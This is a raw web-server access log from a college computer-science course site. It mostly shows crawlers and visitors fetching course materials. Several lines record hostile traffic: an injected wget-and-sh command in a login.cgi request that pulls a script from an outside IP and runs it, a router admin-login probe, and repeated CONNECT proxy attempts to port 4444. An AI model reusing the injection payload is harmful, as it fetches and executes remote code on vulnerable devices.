66.249.79.144 - - [09/May/2021:15:42:30 -0500] "GET /js/div.js?i&datetime=20210509154225 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:15:42:31 -0500] "GET /js/tooltip.js?o&datetime=20210509154225 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.130 - - [09/May/2021:15:42:46 -0500] "GET /JimMartinson/MMDT1021/Resources/CheatSheets/html5-cheat-sheet.png HTTP/1.1" 301 185 "-" "Googlebot-Image/1.0"
66.249.79.144 - - [09/May/2021:15:42:46 -0500] "GET /JimMartinson/MMDT1021/Resources/CheatSheets/html5-cheat-sheet.png HTTP/1.1" 200 972858 "-" "Googlebot-Image/1.0"
207.46.13.102 - - [09/May/2021:15:43:11 -0500] "GET /jeffpolman/CST2845/resources/3com%20gateway.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:15:43:18 -0500] "GET /Credentials/2006-07/CST_2007_EdPlans.xls HTTP/1.1" 200 64512 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.139.148 - - [09/May/2021:15:54:35 -0500] "GET /JimMartinson/MMDT2146/Resources?C=D%3BO%3DA HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.139.148 - - [09/May/2021:15:54:36 -0500] "GET /JimMartinson/MMDT2146/Resources?C=D%3BO%3DA HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.139.148 - - [09/May/2021:15:54:37 -0500] "GET /JimMartinson/MMDT2146/Resources/?C=D%3BO%3DA HTTP/1.1" 200 882 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.112 - - [09/May/2021:15:58:42 -0500] "GET /Credentials/2003-04/ComputerSupportDiploma.04.pdf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [09/May/2021:15:59:30 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/dynamics.html HTTP/1.1" 200 160059 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [09/May/2021:15:59:31 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/wintracker.py HTTP/1.1" 200 5109 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [09/May/2021:15:59:31 -0500] "GET /GaryMeyer/CST1511/WKS6.doc HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.210.174.53 - - [09/May/2021:15:59:44 -0500] "GET / HTTP/1.0" 301 185 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3343.4 Safari/537.36"
192.210.174.53 - - [09/May/2021:15:59:46 -0500] "GET / HTTP/1.0" 200 12370 "http://cst.ridgewater.edu/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3343.4 Safari/537.36"
88.80.21.164 - - [09/May/2021:15:59:47 -0500] "GET /Information/WeatherEmergencies/ HTTP/1.0" 200 7987 "http://cst.ridgewater.edu/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3343.4 Safari/537.36"
194.48.199.121 - - [09/May/2021:16:01:49 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
114.119.139.148 - - [09/May/2021:16:02:43 -0500] "GET /JimMartinson/CST1600/InstructionalGuide.php HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.139.148 - - [09/May/2021:16:02:44 -0500] "GET /JimMartinson/CST1600/InstructionalGuide.php HTTP/1.1" 200 7142 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.149 - - [09/May/2021:16:03:58 -0500] "GET /jeffpolman/CST2840/resources/presentations/wireless-mod2-Part2-80211-MAC.ppt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
92.38.136.69 - - [09/May/2021:16:08:07 -0500] "GET / HTTP/1.0" 301 185 "http://cst.ridgewater.edu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14 Safari/537.36"
92.38.136.69 - - [09/May/2021:16:08:09 -0500] "GET / HTTP/1.0" 200 12368 "https://cst.ridgewater.edu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14 Safari/537.36"
40.77.167.70 - - [09/May/2021:16:08:37 -0500] "GET /jeffpolman/cst1700/resources/cable%20pin%20outs%20(including%20gigabit).docx HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.48.199.121 - - [09/May/2021:16:10:19 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
207.46.13.102 - - [09/May/2021:16:15:47 -0500] "GET /JeffPolman/CST2514/resources/Service%20manuals/HP/4050/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
74.120.14.55 - - [09/May/2021:16:15:58 -0500] "GET / HTTP/1.1" 200 12395 "-" "-"
74.120.14.55 - - [09/May/2021:16:15:58 -0500] "GET / HTTP/1.1" 200 12395 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
34.106.168.83 - - [09/May/2021:16:22:29 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks.pdf HTTP/1.1" 200 6817074 "-" "Go-http-client/1.1"
45.81.233.87 - - [09/May/2021:16:25:53 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:16:27:54 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
194.48.199.121 - - [09/May/2021:16:28:52 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
45.81.233.87 - - [09/May/2021:16:30:18 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
34.94.5.119 - - [09/May/2021:16:31:16 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/LabManualSolutions/Ch02.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.94.5.119 - - [09/May/2021:16:31:16 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/LabManualSolutions/Ch02.doc HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/LabManualSolutions/Ch02.doc" "Go-http-client/1.1"
45.81.233.87 - - [09/May/2021:16:32:17 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
213.16.63.201 - - [09/May/2021:16:35:21 -0500] "GET / HTTP/1.1" 301 185 "-" "curl/7.58.0"
34.125.43.181 - - [09/May/2021:16:37:36 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/EndofChapterSolutions/Ch04.doc HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
34.125.43.181 - - [09/May/2021:16:37:37 -0500] "GET /jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/EndofChapterSolutions/Ch04.doc HTTP/1.1" 404 169 "http://www.cst.ridgewater.edu/jeffpolman/CST2840/resources/Wireless%20LAN%20Book/Answers%20to%20exercises/EndofChapterSolutions/Ch04.doc" "Go-http-client/1.1"
45.81.233.87 - - [09/May/2021:16:38:58 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
46.249.32.208 - - [09/May/2021:16:39:52 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 185 "http://134.29.175.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
46.249.32.208 - - [09/May/2021:16:39:53 -0500] "" 400 0 "-" "-"
66.249.79.146 - - [09/May/2021:16:40:30 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.146 - - [09/May/2021:16:40:32 -0500] "GET /js/CST.js?S&datetime=20210509164030 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:16:40:33 -0500] "GET /js/debug.js?e&datetime=20210509164030 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:16:40:33 -0500] "GET /js/tooltip.js?o&datetime=20210509164030 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:16:40:34 -0500] "GET /js/div.js?i&datetime=20210509164030 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:16:40:34 -0500] "GET /css/tooltip.css?datetime=20210509164030 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:16:40:35 -0500] "GET /css/debug.css?datetime=20210509164030 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:16:40:36 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509164030 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:16:40:36 -0500] "GET /css/CST.css?datetime=20210509164030 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
112.167.232.73 - - [09/May/2021:16:42:03 -0500] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.133.1.173/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 173 "-" "Hakai/2.0"
45.81.233.87 - - [09/May/2021:16:43:31 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:16:45:18 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:16:46:53 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:16:48:33 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:16:52:15 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
207.46.13.155 - - [09/May/2021:16:52:19 -0500] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:16:54:03 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /JimMartinson/ HTTP/1.1" 200 11442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /css/CST.css?datetime=20210509165408 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /css/debug.css?datetime=20210509165408 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /css/tooltip.css?datetime=20210509165408 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /js/CST.js?S&datetime=20210509165408 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /js/div.js?i&datetime=20210509165408 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /js/debug.js?e&datetime=20210509165408 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /js/tooltip.js?o&datetime=20210509165408 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:08 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509165408 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /JimMartinson/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /JimMartinson/ HTTP/1.1" 200 11442 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /css/CST.css?datetime=20210509165441 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /js/CST.js?S&datetime=20210509165441 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /css/debug.css?datetime=20210509165441 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509165441 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /css/tooltip.css?datetime=20210509165441 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /js/tooltip.js?o&datetime=20210509165441 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /js/debug.js?e&datetime=20210509165441 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /js/div.js?i&datetime=20210509165441 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:41 -0500] "GET /images/urc.png HTTP/1.1" 200 230 "https://cst.ridgewater.edu/css/CST.css?datetime=20210509165441" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
69.71.40.22 - - [09/May/2021:16:54:42 -0500] "GET /favicon.ico HTTP/1.1" 200 2238 "https://cst.ridgewater.edu/JimMartinson/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
40.77.167.98 - - [09/May/2021:16:55:29 -0500] "GET /JimMartinson/CST1025/Resources/Introduction_to_Networking%20TOC.txt HTTP/1.1" 200 475 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [09/May/2021:16:56:20 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6a_flash_lecture/data/playerproperties.xml HTTP/1.1" 200 12122 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:16:57:11 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
40.77.167.100 - - [09/May/2021:16:57:51 -0500] "GET /jeffpolman/CST1701/resources/Hyperterminal%20win7/Hyperterm%20Vista.Win7%20directions.pdf HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.100 - - [09/May/2021:16:57:52 -0500] "GET /JimMartinson/CST1600/Resources/comp4_unit6d_flash_lecture/player/zoom.html HTTP/1.1" 200 1433 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:16:59:10 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
207.46.13.98 - - [09/May/2021:17:00:02 -0500] "GET /JimMartinson/CST1510/Technical%20Reference/BIOS%20Content/ROM%20BIOS%20Hard%20Drive%20Parameters.pdf HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:17:01:13 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:02:49 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:04:20 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:06:24 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:08:24 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:09:56 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:11:24 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:13:02 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
40.77.167.100 - - [09/May/2021:17:14:48 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/ns2/basic1.tcl HTTP/1.1" 200 1629 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:17:15:09 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:17:44 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:19:26 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
85.208.98.27 - - [09/May/2021:17:20:44 -0500] "GET /robots.txt HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.27 - - [09/May/2021:17:20:44 -0500] "GET /robots.txt HTTP/1.1" 404 169 "http://cst.ridgewater.edu/robots.txt" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [09/May/2021:17:21:10 -0500] "GET /JimMartinson/CST1025/Resources/Software/Network%20Monitoring%20Tools.html HTTP/1.1" 200 348856 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
45.81.233.87 - - [09/May/2021:17:21:10 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:23:07 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:24:44 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:26:19 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:28:11 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
40.77.167.100 - - [09/May/2021:17:29:36 -0500] "GET /JimMartinson/MMDT1021/?Assignments HTTP/1.1" 200 7161 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:17:30:10 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
40.77.167.98 - - [09/May/2021:17:30:20 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/mininet/competition.py HTTP/1.1" 200 3685 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
45.81.233.87 - - [09/May/2021:17:31:36 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:33:37 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
66.249.79.146 - - [09/May/2021:17:34:44 -0500] "GET / HTTP/1.1" 200 12396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.146 - - [09/May/2021:17:34:46 -0500] "GET /js/tooltip.js?o&datetime=20210509173443 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.148 - - [09/May/2021:17:34:46 -0500] "GET /js/CST.js?S&datetime=20210509173443 HTTP/1.1" 200 12049 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:17:34:47 -0500] "GET /css/debug.css?datetime=20210509173443 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:17:34:47 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210509173443 HTTP/1.1" 200 1018 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:17:34:48 -0500] "GET /css/tooltip.css?datetime=20210509173443 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:17:34:48 -0500] "GET /js/debug.js?e&datetime=20210509173443 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.144 - - [09/May/2021:17:34:49 -0500] "GET /css/CST.css?datetime=20210509173443 HTTP/1.1" 200 24467 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
66.249.79.146 - - [09/May/2021:17:34:50 -0500] "GET /js/div.js?i&datetime=20210509173443 HTTP/1.1" 200 7433 "https://cst.ridgewater.edu/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36"
45.81.233.87 - - [09/May/2021:17:35:15 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
45.81.233.87 - - [09/May/2021:17:37:03 -0500] "CONNECT 50.116.40.247:4444 HTTP/1.1" 400 173 "-" "-"
40.77.167.70 - - [09/May/2021:17:47:06 -0500] "GET /JimMartinson/MMDT1022/Labs/Lab02/ HTTP/1.1" 200 7109 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [09/May/2021:17:50:39 -0500] "GET /jeffpolman/CST2703/resources/Fall2011.webex.recordings/Chapter6.wrf HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
35.233.170.71 - - [09/May/2021:17:52:51 -0500] "GET /jeffpolman/CST2703/resources/ppts/Exploration_Accessing_WAN_Chapter2.ppt HTTP/1.1" 301 185 "-" "Go-http-client/1.1"
35.233.170.71 - - [09/May/2021:17:52:51 -0500] "GET /jeffpolman/CST2703/resources/ppts/Exploration_Accessing_WAN_Chapter2.ppt HTTP/1.1" 404 169 "http://cst.ridgewater.edu/jeffpolman/CST2703/resources/ppts/Exploration_Accessing_WAN_Chapter2.ppt" "Go-http-client/1.1"
185.191.171.21 - - [09/May/2021:18:04:25 -0500] "GET /robots.txt HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
